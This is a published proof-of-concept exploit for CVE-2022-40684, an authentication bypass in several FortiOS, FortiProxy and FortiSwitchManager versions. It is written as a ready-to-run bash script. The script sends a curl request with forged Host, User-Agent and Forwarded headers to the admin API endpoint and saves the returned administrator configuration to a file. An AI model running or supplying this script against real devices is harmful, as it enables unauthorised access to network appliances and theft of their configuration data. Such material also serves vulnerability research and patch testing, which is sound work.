Fortinet 7.2.1 Authentication Bypass

`# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)  
# Date: 13/10/2022  
# Exploit Author: Felipe Alcantara (Filiplain)  
# Vendor Homepage: https://www.fortinet.com/  
# Version:  
#FortiOS from 7.2.0 to 7.2.1  
#FortiOS from 7.0.0 to 7.0.6  
#FortiProxy 7.2.0  
#FortiProxy from 7.0.0 to 7.0.6  
#FortiSwitchManager 7.2.0  
#FortiSwitchManager 7.0.0  
# Tested on: Kali Linux  
# CVE : CVE-2022-40684  
  
# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass  
  
# Usage: ./poc.sh <ip> <port>  
# Example: ./poc.sh 10.10.10.120 8443  
  
#!/bin/bash  
  
red="\e[0;31m\033[1m"  
blue="\e[0;34m\033[1m"  
yellow="\e[0;33m\033[1m"  
end="\033[0m\e[0m"  
  
target=$1  
port=$2  
  
vuln () {  
  
echo -e "${yellow}[+] Dumping System Information: ${end}"  
  
timeout 10 curl -s -k -X $'GET' \  
-H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out  
if [ "$?" == "0" ];then  
grep "results" ./$target.out >/dev/null  
if [ "$?" == "0" ];then  
echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}"  
else   
rm -f ./$target.out  
echo -e "${red}Not Vulnerable ${end}"  
fi  
  
else  
  
echo -e "${red}Not Vulnerable ${end}"  
rm -f ./$target.out  
  
fi  
  
  
}  
  
vuln  
  
`